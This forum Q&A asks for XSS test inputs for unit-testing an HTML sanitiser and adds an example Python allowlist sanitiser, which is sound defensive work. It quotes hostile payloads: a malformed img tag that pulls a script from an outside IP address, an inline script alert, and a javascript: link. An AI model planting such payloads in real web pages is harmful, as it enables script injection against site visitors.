XSS Torture Test - does it exist?


Question


I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"


I know there's a Mime Torture Test which comprises several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivalent for XSS, i.e. a list of examples of dodgy html that I can throw at my sanitiser just to make sure it works OK.


If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.

Thanks in advance :-)


Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.

Recommended answer


Take a look at this XSS Cheat List: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
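As an added example that is not part of the question or the answer: a minimal allowlist sanitiser built on Python's standard-library HTMLParser, with the Coding Horror sample from the question wired into a unit-test-style torture run, which is the kind of offline check the asker wanted. The tag allowlist and the two extra textbook cases are assumptions chosen for illustration; a real sanitiser would take its cases from the OWASP cheat sheet linked above.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist (assumed for illustration): tag -> attributes permitted on it. Anything else is dropped.
ALLOWED = {"b": set(), "i": set(), "p": set(), "a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = {"", "http", "https"}  # "" covers relative URLs

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # drop the tag; its text content still arrives via handle_data
        seen, kept = set(), []
        for name, value in attrs:
            if name in seen or name not in ALLOWED[tag] or value is None:
                continue  # browsers keep the first duplicate attribute; so do we
            if name in ("href", "src") and urlparse(value.strip()).scheme.lower() not in SAFE_SCHEMES:
                continue  # rejects javascript:, data:, vbscript: and friends
            seen.add(name)
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <img .../> must not emit a bogus </img>
    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text, including <script> bodies

def sanitize(html: str) -> str:
    # Rebuild markup from a real tokeniser rather than regex-matching the raw string,
    # so malformed input (unbalanced quotes, tags inside attribute values) is decoded
    # much as a browser would before the allowlist is applied.
    p = AllowlistSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)

# Constructed torture cases: the Coding Horror sample from the question plus two textbook shapes.
TORTURE_CASES = [
    '<img src=""http://www.a.com/a.jpg<script type=text/javascript \n'
    'src="http://1.2.3.4:81/xss.js">" /><<img \nsrc=""http://www.a.com/a.jpg</script>"',
    "<b>hi</b><script>alert(1)</script>",
    '<a href="javascript:alert(1)">x</a>',
]

def run_torture(cases=TORTURE_CASES):
    """Return the inputs whose sanitised output still carries active content."""
    return [c for c in cases if any(m in sanitize(c).lower() for m in ("<script", "javascript:"))]
```

An empty list from run_torture() is the pass condition for the unit test; benign markup such as `<img src="/a.jpg" alt="pic">` passes through unchanged, which is worth asserting too so the allowlist is not silently stripping everything.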
